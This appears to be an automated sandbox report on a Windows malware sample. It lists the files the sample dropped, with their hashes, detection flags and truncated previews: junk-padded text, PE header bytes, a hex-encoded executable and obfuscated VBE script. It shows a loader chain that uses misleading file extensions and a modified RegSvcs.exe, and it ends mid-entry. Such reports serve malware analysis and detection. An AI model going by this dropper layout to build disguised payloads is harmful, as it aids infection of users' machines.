                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):569
                                                                                                                                                    Entropy (8bit):5.607960549209402
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:wbKXLINQ3giBAseD3lImN8Rq674u2bWwFVCaMlUNJ09ON0aBPc:wbKXMQVBJnmc779gWg9G40aO
                                                                                                                                                    MD5:7399AD2ED1976A8AF8FD293039757336
                                                                                                                                                    SHA1:1B60BB127972D76F4243310B05849C2937E4BE76
                                                                                                                                                    SHA-256:06E60D78DD1402360ED52DD46A1F09787B52CBC4CEF80676F5600CA49CCBBB23
                                                                                                                                                    SHA-512:446FA89E11D2D3EE7ECE303273C573D37AE6A7D490F70101B8A174AE6F3FAE859F51F0FC8D52588B6C6C00FE98C2943556FC8BA9A33D8324CBAA2F649371449B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:G63Ah60Y48540xIUNl7j2083w0Gnh5514HSH2A53ogqaCpG19VV2c82493j7088nLOuOPU5AWMf09915E2ag96oD5467P412584MW1xLHVZQi6BifJ1245298T3..BorderConstants FontConstants..lpoy252u2POZL4i2w5FZI03pc0g6068ndO1EOklhFmm27646swE3hQ3554gRI9fup9v0l37..FontConstants StructureConstants..5199q8DhUO0Z2Sv1h190iH16p2o9v8U56N600q00C31U6637c9BcB983x6y7M350y7dJz3H133118968N9R3j1437U52237t8I25H..ComboConstants ToolTipConstants..8n5074w2TQK442655GI5N99m1A42Mt03KgSpJN3Y6Xl4n4BV2J9UwgI7qpRJ57KqKh05ZgjU93M5la8iAGl7o4TEKn8WFW3tM24P1U810wE5Y051948CULA454jgHKw28kTr9Q..ComboConstants TreeViewConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                                                                                                                                    • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: qZkywW6Q0b.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: AlBXxWizEX.msi, Detection: malicious, Browse
                                                                                                                                                    • Filename: mEudzoO1bG.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: HoGsuqrMLl.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: doc000000037294.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: doc000000037294.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: KKKK.hta, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):947288
                                                                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: 1aG5DoOsAW.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: Factura-2410-CFDI.bat, Detection: malicious, Browse
                                                                                                                                                    • Filename: DGFmCcZnM0.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: qZkywW6Q0b.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: AlBXxWizEX.msi, Detection: malicious, Browse
                                                                                                                                                    • Filename: mEudzoO1bG.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: HoGsuqrMLl.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: doc000000037294.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: doc000000037294.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: KKKK.hta, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\ukphwj.xl

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):504
                                                                                                                                                    Entropy (8bit):5.6259340620268485
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:nLEs50ubuRJk68a9EKgRecunhJ932kDtx/:LXpbArd9wDuhJR2k/
                                                                                                                                                    MD5:35470D47483607BF2DE0FDC542EFD0A6
                                                                                                                                                    SHA1:C2085CF4A1A687201DCB2AF61D7F2BB28473F664
                                                                                                                                                    SHA-256:E72BF5652C4E6E6FCCB590BFCB2E6081C4C6F540D61ABDE5FF168BA641D34C6F
                                                                                                                                                    SHA-512:D95FFCC8458D3DB253388CFFC61DB76331008AA0D9223E91B8ACB2E1C60AD0C19501720FC67F5207B82B191ECFD8BC75E479C3F37FFBA83493CAC61B11680A36
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:nj3b210Z3UP3L26cnFC2r618n9YZizNA9g8gK1AXX134125Lzy02TEt69Uth0S4Qz5l67Lv885M28zC1330m43x1k6n1015HCA8ZK29UA5X5bHY13..UpDownConstants StructureConstants..eF999mo8xq0t7411wvZjxO11qr2WR9g71P..BorderConstants BorderConstants..8327hUvZe4n53udL12vuK898eh9zn29HLbJ4319wH6j2jN5t9473y7Ef0FOc419K7C6WZ9F7zXVtMXoyDNH15Fu95Fp636..ButtonConstants StructureConstants..v6565y0pM4EXh6bl8ufHEF37mqsf5zNnMs1R19Z1xd8f010cmB6sSaVG7C5UD3m98fjd18934A6cp6K9409385whk4p94T7y65Y10ZUPla6733M01H47..GuiDateTimePicker ComboConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\wihpoq.mp2

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):533
                                                                                                                                                    Entropy (8bit):5.555122671725166
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:RdDw8Z9v6lt21VgwOBPsptEyIrQakNSc3fA6:jUs9v+rK0bkAc3l
                                                                                                                                                    MD5:18B3CA792233B183954D86380D53BAF2
                                                                                                                                                    SHA1:FE7D78E2EF67B2B37BF608B7D8D2D9820A483322
                                                                                                                                                    SHA-256:4E8D26FBD55BDA61F1CBDA0326439663F32B735D8B70B52D531150AACBE236C8
                                                                                                                                                    SHA-512:6CE4A5ADBB3F9C48C5B35A03188DD0EA9218D2D4A0E79AD19DDFC77FF882A5B39BC57E62C8EC7A4F289E8127E5520E9FF1465FC0502057D43EB61F100522E562
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:b4f726l0QGf76y..ButtonConstants FileConstants..3WbMc4AZ97o6I09TWs53ba879m2l4yVIp43cIp06W213mvDU4w18lKl3rJMz5f2cG00M6535E05v4jr29A22881o4UCj9666hu9l7ic5o442621Kcj453JX68k63..UpDownConstants BorderConstants..073CZ36HV5W1QjzX822E01DxZhY624VCfQ7m3m3574k6fQ64in5a143S44k21VQgq68no8q2A6X8JC81E0597K272m03gRe2C9KBT53..DateTimeConstants TreeViewConstants..52e5PwO90U61RO743Wn9m637x7og2V6VKBWk8mJEr42641Gq9OD79wcv1h2PqR34422GU2uZQ7Mp0b5528biUH121230atT782477cDk2m6w65E70tpFa02BrX6NzNj5k92n762Pqne67512b91mDeo..BorderConstants ColorConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\wlsraclfv.mp3

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.5345726532215
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:xPX+i9s1IZgyy+naIaSbICMulsOraBP0A9R6ved9:xPX+Gs1IMcf5ICdzaCA36Gd9
                                                                                                                                                    MD5:4C33AC9510E5F22AEA359252392E7DC6
                                                                                                                                                    SHA1:D8F0D8C95A43043F68C1794FF7CEF803CCDCB969
                                                                                                                                                    SHA-256:5603CB963F200915EB60ACEB7837EDB35CB1BE8CCFF16FBA9DD1EAF26272DE06
                                                                                                                                                    SHA-512:96610AC9CEB1040CF1F063D701148848289ED51E7A1A6C235DD684B4A75073FB7BA092686EDD97AFDEEAEF8DF390BE88220633215C42325BFFB141C03D0A98BF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:5Dm8835K23W09Hj601A42B4U6li2423HmO5e10X4CedB37E0BtoOWy7qT8XVvc1U42j18kC530J1542wMgX08OL..StructureConstants ToolTipConstants..8W5V0m4F54Y5fXRi099K3g4oXt0R0W0Q7h136r9718k56979K915643PGj4BKlH9885023xCJU9jL3KByQL35301oJ0Hm1s693i2U23Kr83Q6umW0589RW7j5G1v22Ywg..GuiDateTimePicker ButtonConstants..3Hp9CZ7851K3ZTPFX88Cm60DtuA9R8wD04q7D4178Q64trFM417b2Ua4glw8Z15Uc6v020D7A18F425By7..ToolbarConstants TreeViewConstants..U5L14060Qasd4Xm82t330h28PZ0e5Wx..StructureConstants StructureConstants..2hCx10E5X5OO753T2X6ZpjtA2039n3jTQ58936346A72Sst21ob7CCk712O..ButtonConstants UpDownConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\Desktop\M1Y6kc9FpE.exe
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):75082
                                                                                                                                                    Entropy (8bit):2.98395248326991
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:QRzzzzzzzzzzzpYqqqqqqqqqqqqqqqqqqqqqqqqN0YDDDDDDDDDDDDDDDDDDDDDE:pH5mUKW7/3WCv+nohnrQ
                                                                                                                                                    MD5:E35FFF73AEE2E4616A02721A2BB87382
                                                                                                                                                    SHA1:493FB9EE1BE78EE56AFDAAA41B0C96470A20F491
                                                                                                                                                    SHA-256:27BBC7BAED22B649F4F9E5C8F07B46DE15D18AB0D98EA38FF8B28D9690BF553C
                                                                                                                                                    SHA-512:76A901A66E701C7C937AABEF2D5B4F8E488E25D89C683DA61E28B6419AAA75C322A9E5F66C9951388F876E89B485BCBC0AB2108F6FB58882205503E3FB08F4BE
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:..T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.T.e.l.e.V.r.a.m.(.8.7.).:.....T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.T.e.l.e.V.r.a.m.(.1.1.).:.....T.e.l.e.V.r.a.m.(.1.2.4.).:.

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RegSvcs.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):45984
                                                                                                                                                    Entropy (8bit):6.16795797263964
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                                                                                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                                                                                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                                                                                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\ahpskwthu.docx

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):526
                                                                                                                                                    Entropy (8bit):5.56088650926032
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:OR8GBPduc+twADhqd2jhdyub7zKMg0JVy0:OR8GLucahPLy6/KMg10
                                                                                                                                                    MD5:56AE97A5897D70A0C7FADE5F29767A43
                                                                                                                                                    SHA1:E6ED9186AB3B3211092508F8E4FBE46E058839F7
                                                                                                                                                    SHA-256:96F922028E5673AF15F9AF520BA2F01496FEFB7D6017B82B29946D2E09351704
                                                                                                                                                    SHA-512:7CFFA2028FDF0CB5F659C644F666A426ADED46D06020FAF6DA8CF768F80960B6DB02CDFA958EE6F746466F426D7420520980E34F33A0CFA07950EDC1735016A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:619533KU8JDc44Q81610b78c31412CUd96dN3177U3E4z7O0M53180I..ColorConstants GuiDateTimePicker..8s51L174dbL235j5NAT7oKX537K9ez..ComboConstants TreeViewConstants..484LG864994b3s9u996vRGiy882YR8Ql7eb39i47865JcAN39mMN97C35oGoUQ8P2U61492LfnxY5pc1Oe0ip52D8Y0a5aI32545I4ZEVSV5QUUxKrG59848Z71G02750F0t91H82UH63Cln54fI8pX..ButtonConstants FileConstants..Z741s9vKlJ3y1W7J323l2i8IQ440cK38824714855Ne5dnyL7mo6r9zM1kl14Q880A0LR71L4jH22346ch7h67r664378E7901S9SO793k500tw3M16ZX173hZdmAgpVE60hJNnjAK0PQ356Av5X2..ToolTipConstants BorderConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\aiccixqlw.exe

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):578
                                                                                                                                                    Entropy (8bit):5.530545679464256
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:mdCqOBPbyICH8jQLa77pTdenxfGDCDL0HbBPkV4udLzH:B9CcjQu77pT410qqbOVvLzH
                                                                                                                                                    MD5:68925419289F46D376B8D0DE41A64C99
                                                                                                                                                    SHA1:9C876267E22ACB8881C7FCFC9006D97813822C95
                                                                                                                                                    SHA-256:1449B0AEFAB21761CD54949134B02FFB7042ED3FB91E36032991922199722EC7
                                                                                                                                                    SHA-512:E6E5A5498ADA1E845AD2907FE040ED69CDAC03F43702F21C8E11A666CBB4D9845AD8D6E7CFC078D2FC54B0190D261B90A580338279C94CC9B79DA4751727EDF2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:K3kBK4Brv7699pv89D87UW42M70a7tAyn..DateTimeConstants TreeViewConstants..2A0b3537B85k5mg5J3KthMc8jr7A..ToolbarConstants BorderConstants..366558cyh1ckV7NHdy2La3J35494L6oO50328EYyc86dZYG11W08PnL1d4J4PAd405x57F086cGBmgN003723k4j145283K6cd112sWH111r..ToolTipConstants ComboConstants..713RWX5R5n348I565sos8455wmqT684Gw5OABhPeCHi67u6w9R11435m000f9f34509570j0N67e..ComboConstants TreeViewConstants..43477G9032d5472K924x40y1Rxmy9jcaO1HM5p654t8X31zr60933r63y035BBP467MoM421Dg8Jv6q10U0G04X911r2O1d538D4npkbza909LF420Tj4okZd9WCM0Qj20dB9A06G028T97fJE8F9lJ..ToolTipConstants UpDownConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\amfmrpfqdh.msc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):35713
                                                                                                                                                    Entropy (8bit):5.5757639550354
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:nPAvrzduvmfWP09cb22tqThZeLkujscEppQ7/UBD7sP5a:YD5uvmC09BThBlcQQda
                                                                                                                                                    MD5:F8EC3A47A92F1C45B9F6582F7CF621C1
                                                                                                                                                    SHA1:452FB70C325BA60247ECF3EB7C05C188E576CC60
                                                                                                                                                    SHA-256:771DB32E8BDD02BE6AC90F3D0902D08163C3F49CBF21F46B069BD8DA32ED0C74
                                                                                                                                                    SHA-512:DBA6D256838DCD1A30E68C35BBC5E11B51B6AA05BFECC437EF70B67B8B89A05B9865F92C90AEBC51F76832F8137EF28C4A11BDAA112519BD0419D18699937764
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:3754G5..D05169NtTJ45cn0w69855AVY75L585Yh3PD01hx7NuUWz0oOI0ONrb0V2Tn348CY6i57KXkg1c12T12ytn0..z4D028M773ydLB65HgDX9t6Ws3q23I5tX..p10995248Bhw6G2G2zn46cV4v04zjP8Yf4x4n1H1T9YWWU146QM23WxJ..h15v3732TLP700AgdCoSmv3tCvU16zhjV9Dx2opx0ZNW..22oYE8803d96e9qZXKG7fOU6ukk22C6mu..p3o37N97Q8jI40535bk5IShKy0x0Pz46z8K04417UGX5PECCex9Q7o0ZxR3xhpA58a3rnJ..v4YCI2UR5P80h237CA42Av893W6m4y63K0XF7sBrKHo5K163W0HZ7boNY1ZZ56PQ5Loy7YE8..857853y271Pn501qD4D9SM136PC198w03k4ty4N0GaeW9vk8UjZ4iE455D8..1CA6mUn75a671x0Qj7OXZy7F807569Y49b7926..113W8z91076L2o9338i82hgE5UYB6EEtD34212886gk6No9W..0T87jH6u3k5b60o1K4f994x7C1z8qfzQ14..762b033d8T68U1620b49I8cb3DHQOh5k531BU3bd65hWRO247z07SN2c75M18OG922o6i6kK3844625DW3Jsut9..DAiWrw22OkU501BXB24AR48xlvzuKpsl05Q9U464g0yDO0P96..AbBw0t4ab1J2f8qBfSC6OAMjc5UF96..0h06n144Bp55H0o2O819cwv73BUl42518O80T4kuXC7V6HL3kQY3vb..28317cjBEjGvS..T2U8MjP24244XElrq7ePm98UWhX00307N305b9AXnX4r0d9ywrC19V58880y60..M0E6J611p2VGwHTIY6x21oCf72K12486Wz0420L3357JQh..7982l3987r7XHDg6YZ8897z8451m558tu1kA1262D6448

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\bhbdl.dll

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):579
                                                                                                                                                    Entropy (8bit):5.59314018146621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:hKfrpxtEBNTNHmRPQdSqdAFAPN78YuuSdwZpyPh:KrmHZmRPQdaFtV4Q
                                                                                                                                                    MD5:F3372B55E755A70E9D39941A8AF77BD7
                                                                                                                                                    SHA1:164A9D56BDE91BF883F9A97D4203689C4EC13D5E
                                                                                                                                                    SHA-256:FBFD9CD1320C29A7AD37207A415D1503F686185F901299EA0870420B8A4A66AE
                                                                                                                                                    SHA-512:7CB1031AEDE051EB28BE6E72BAD4C66A5CAEA5C089BB73C2D2268F9D3DB8B1412C15383E8A68760F1AFE276B0B0A0901A4ED07A1DA1C0A04943CA5DCD7DE3CA6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:844SM564629y802766Z1XNg6MR4681P751fibf171Z581Uy65IU6SD8xsBDv7U7J2WjQ3Z74f29CcYCo240J5wT5Bz2o862s9D9qFF9E8t7h83W1ZO..GuiDateTimePicker ToolTipConstants..AN5ZfHq416b6E2XgvK1E561bB11VQ6IZ198ofDr944XP6du8fjoC4VB72LH1913Py4087574170165IO5293i..ComboConstants ButtonConstants..U356440fZ85EGkjZuv05YXE3E8VIq2qg3V80659..TreeViewConstants ComboConstants..62L06cgDIEJlL33xBk7KO1yILx3H8850E7A00z2464T802O1S73m7M678KilaCj800LR488J3pVuie39bp6558878w45Y243g4..FontConstants ColorConstants..e1k546N4K0853Imq24466jpDWLf070kzn7YuD3I1O2N17aD95802498361LK9u24lS0i..TreeViewConstants FileConstants..

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\btieiqt.wxc

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):360301
                                                                                                                                                    Entropy (8bit):4.03500126803888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:ODNuvLVuBeU1elwm4CaOYIIFdGuOqmM3iRVb1:2QT+RdiqW9
                                                                                                                                                    MD5:FAE6EE35C0F5AC2DC4885C0DE8E88032
                                                                                                                                                    SHA1:587BF6F4105D4420762C463BA33E9E3BA677E85F
                                                                                                                                                    SHA-256:4DB090B6F1CD2501C929B31C2E29D4D0A4DDF1E81BE6800E763D8C45BEA8744D
                                                                                                                                                    SHA-512:1CE62D900017DD4545023ACC3CA32DAEE7EB454A6144C99958D57E88838402013854F410B8BE1FB5D607819C48BA72FEFECC11D2C78A81408855BF3899E04B38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:0x4D5*4552E8]]]]5883E8098_C883C03C8_]03C/83C0280308FFE/9]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]0C]]]]E/F_*0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24]]]]]]]*_FC08E*EF9D66_9EF9D66_9EF9D66_9F4]CD_9*99D66_9F4]F8_9EC9D66_9F4]F__9EE9D66_952696368EF9D66_9]]]]]]]]]]]]]]]]5045]]4C0/0/]/E6*6752]]]]]]]]E]]20/0_0/0*]]D202]]]]]]]]]D0F]/]]/]]]0F]2]]]4]]0/]]]]2]]05]0/]]]]]05]0/]]]]]]F]2]]02]]]]]]02]408/]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]02E74657874]]]34D/02]]/]]]0D202]]/]]]]]]]]]]]]]]02]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

                                                                                                                                                    C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docx

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):91666250
                                                                                                                                                    Entropy (8bit):7.1072697002412175
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:OVGVXVzVBV1VjVWV7VIV+VLVLVdVrVUVCVeV/VtVIVZVzVwVcVaVuVfVWVNVUVmT:sg
                                                                                                                                                    MD5:3BB3905D87F16791DDEC1379A873A8B8
                                                                                                                                                    SHA1:2289260256270F50B1681022D63F4CC4DEA68FAD
